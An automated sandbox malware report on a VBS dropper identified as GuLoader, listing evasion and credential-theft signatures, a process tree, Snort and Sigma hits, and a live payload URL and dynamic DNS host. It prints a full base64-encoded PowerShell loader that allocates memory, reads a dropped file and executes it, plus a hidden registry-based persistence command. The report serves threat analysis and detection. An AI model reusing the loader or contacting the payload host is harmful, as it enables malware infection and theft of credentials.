
Windows Analysis Report DETAILS.vbs

Overview

General Information

Sample Name: DETAILS.vbs
Analysis ID: 528495
MD5: 6ece5dd9df7e2a34f492adc0c6184d81
SHA1: f205057a0d17fab518a137e266335883a581289b
SHA256: fc344554030bfb7f2ca7c79e99a5006f740c3c9f210dc38757c53537c9692f5e

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Creates an autostart registry key pointing to binary in C:\Windows
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Csc.exe Source File Folder
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Searches the installation path of Mozilla Firefox
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 5176 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 6584 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 1528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 5176 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 6228 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
    • conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 3424 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
  • powershell.exe (PID: 2072 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADI
AIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHI
AcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4
ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 1580 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
  • powershell.exe (PID: 5176 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://103.167.84.150/mconta/Host_DwUbTLydN243.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | 
0000000D.00000002.16237325177.0000000009770000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | 
0000000E.00000002.16379281085.00000000098B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | 
00000003.00000002.15295840627.0000000009B70000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | 
00000013.00000002.16194415539.0000000002D20000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | 
(6 entries in the full report; 5 listed here)

Sigma Overview

System Summary:

Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Sigma detected: Non Interactive PowerShell
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBu
AHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjA
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132823131356829074.6584.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp; Malware Configuration Extractor: GuLoader {"Payload URL": "http://103.167.84.150/mconta/Host_DwUbTLydN243.bin"}
Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\mla4kvb3.pdb source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp
Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\vybs2gqu.pdb source: powershell.exe, 0000000E.00000002.16353125853.0000000005015000.00000004.00000001.sdmp
Source: Binary string: $pm/C:\Users\user\AppData\Local\Temp\uotckr0j.pdb source: powershell.exe, 0000000D.00000002.16211068158.0000000004F11000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16210155377.0000000004E74000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49805 -> 103.167.84.150:80
Source: Traffic; Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49808 -> 103.167.84.150:80
Source: Traffic; Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 103.167.84.150:80
Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin
Uses dynamic DNS services
Source: unknown; DNS query: name: septnet.duckdns.org
Source: Joe Sandbox View; ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View; ASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
Source: global traffic; HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.167.84.150 | Cache-Control: no-cache
